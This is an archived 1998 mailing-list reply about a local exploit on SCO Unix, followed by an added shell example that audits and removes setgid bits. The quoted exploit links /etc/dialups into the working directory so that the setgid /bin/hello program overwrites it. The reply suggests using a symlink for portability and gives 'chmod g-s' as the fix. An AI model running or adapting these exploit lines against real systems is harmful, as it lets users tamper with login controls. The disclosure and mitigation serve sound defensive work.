Re: Fw: Exploit for SCO.

From: John W. Temples (johnat_private)
Date: Fri Sep 11 1998 - 16:20:48 PDT

    On Thu, 10 Sep 1998, Leshka wrote:
    
    > tty=`tty`;ttyfile=`pwd`/`basename $tty`
    > echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to
    > disable"
    > echo "login or just type <CTRL>-D to login enable. Sorry for the manual
    > work."
    > ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile
    
    The exploit fails if your CWD is not in the same file system as /etc.
    Using a symbolic rather than a hard link fixes that.
    
    The exploit can be defeated with:
    
    # chmod g-s /bin/hello
    
    --
    John W. Temples, III       ||       Providing the first public access Internet
    Gulfnet Kuwait             ||            site in the Arabian Gulf region
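
The mitigation in the message above, wrapped in a check that the set-group-ID bit is really gone afterwards. This is an added example, not part of the original post; the function names and the temporary `hello` file are constructed stand-ins for `/bin/hello`.

```shell
# has_sgid FILE: succeed if FILE exists and carries the set-group-ID bit.
has_sgid() {
    [ -g "$1" ]
}

# list_sgid DIR: print every regular file under DIR that has the setgid bit.
list_sgid() {
    find "$1" -type f -perm -2000 -print
}

# drop_sgid FILE: clear the bit with the chmod from the message, then verify.
drop_sgid() {
    if ! has_sgid "$1"; then
        echo "$1: setgid bit not set, nothing to do"
        return 0
    fi
    ls -ld "$1"                  # record mode and owning group before the change
    chmod g-s "$1" || return 1
    if has_sgid "$1"; then
        echo "$1: setgid bit still set" >&2
        return 1
    fi
    ls -ld "$1"                  # mode after the change
}

# demo: run the audit against a constructed file, never against a system path.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/hello"               # constructed stand-in for /bin/hello
    chmod 2755 "$d/hello"
    echo "setgid files before:"; list_sgid "$d"
    drop_sgid "$d/hello"
    echo "setgid files after:";  list_sgid "$d"
    rm -rf "$d"
}

demo
```

On a real host, `list_sgid /bin` gives the inventory to review and `drop_sgid /bin/hello` (as root) applies the change.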
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:16:10 PDT